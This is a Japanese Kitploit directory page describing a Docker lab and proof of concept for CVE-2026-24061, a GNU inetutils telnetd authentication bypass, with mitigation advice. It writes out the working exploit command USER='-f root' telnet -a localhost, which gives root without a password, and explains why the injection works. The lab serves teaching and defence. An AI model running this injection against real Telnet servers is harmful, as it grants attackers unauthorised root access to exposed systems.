Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — これは、現在進行中で活発に悪用されているTelnetの脆弱性の深刻度を強調できるシンプルなPoCです。なぜ人々がまだTelnetを使っているのか…私には理解できません。 | Kitploit
ツール/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
コンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

これは、現在進行中で活発に悪用されているTelnetの脆弱性の深刻度を強調できるシンプルなPoCです。なぜ人々がまだTelnetを使っているのか…私には理解できません。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
16ヶ月前未レビュー

CVE-2026-24061: GNU inetutils-telnetd 認証バイパス

CVE-2026-24061 を実証するための Docker ラボ — GNU inetutils telnetd における重大な認証バイパス脆弱性で、11年間 パッチが適用されないままでした。

脆弱性の概要

Telnetd は USER 環境変数をサニタイズせずに直接 /usr/bin/login に渡します。login バイナリには認証をスキップする -f フラグがあります(事前認証済みセッション用に設計されています)。USER='-f root' を設定することで、攻撃者は login を騙してパスワードなしで root アクセスを許可させることができます。

影響を受けるバージョン: GNU inetutils 1.9.3(2015年3月)から 2.7 CVSS スコア: 9.8(Critical) 修正: inetutils 2.8+ に更新

クイックスタート

root@kitploit:~
# イメージをビルド
docker build -t telnetd-exploit .

# コンテナを実行(user1 としてシェルに入ります)
docker run --rm -it telnetd-exploit

# エクスプロイト — パスワードなしで root を取得
USER='-f root' telnet -a localhost

root シェルに入ります。whoami を実行して確認してください。

動作の仕組み

root@kitploit:~
1. クライアントが接続: USER='-f root' telnet -a localhost
2. telnetd が USER 環境変数を受信: "-f root"
3. telnetd が実行: /usr/bin/login -f root
4. login が -f を「認証をスキップ、ユーザーは事前検証済み」と解釈
5. 攻撃者は root シェルを取得 — パスワード不要

-f が存在する理由

-f フラグは正当なものです — ユーザーがすでに認証されているシナリオ(信頼できるローカルセッションなど)向けに設計されています。問題は、telnetd が login に渡す前に USER 変数をサニタイズしないため、リモート攻撃者がフラグを注入できることです。

影響

2026年1月時点:

  • 約80万台 の Telnet サーバーが世界中で露出(Shadowserver)
  • 約29万台 が Shodan にインデックス登録
  • この脆弱性は実環境で積極的に悪用されています(CISA KEV カタログ)

Telnet を使うべきでない理由

このバグがなくても、Telnet はパスワードを含むすべてを平文で送信します。代わりに SSH を使用してください。

ProtocolEncryptionAuthentication
TelnetNonePlaintext
SSHYesKey/Password

ファイル

root@kitploit:~
.
├── Dockerfile              # 脆弱な Debian コンテナをビルド
├── docker-entrypoint.sh    # inetd を起動し、user1 に降格
└── README.md

緩和策

  1. 更新 — GNU inetutils 2.8+ に更新
  2. telnetd を無効化 — ポート 23 をブロック
  3. SSH を使用 — もう2026年です

参考リンク

  • CVE-2026-24061
  • 元のアドバイザリ
  • CISA KEV エントリ

クレジット

ラボは leonjza/inetutils-telnetd-auth-bypass に基づいています。

ツールをダウンロード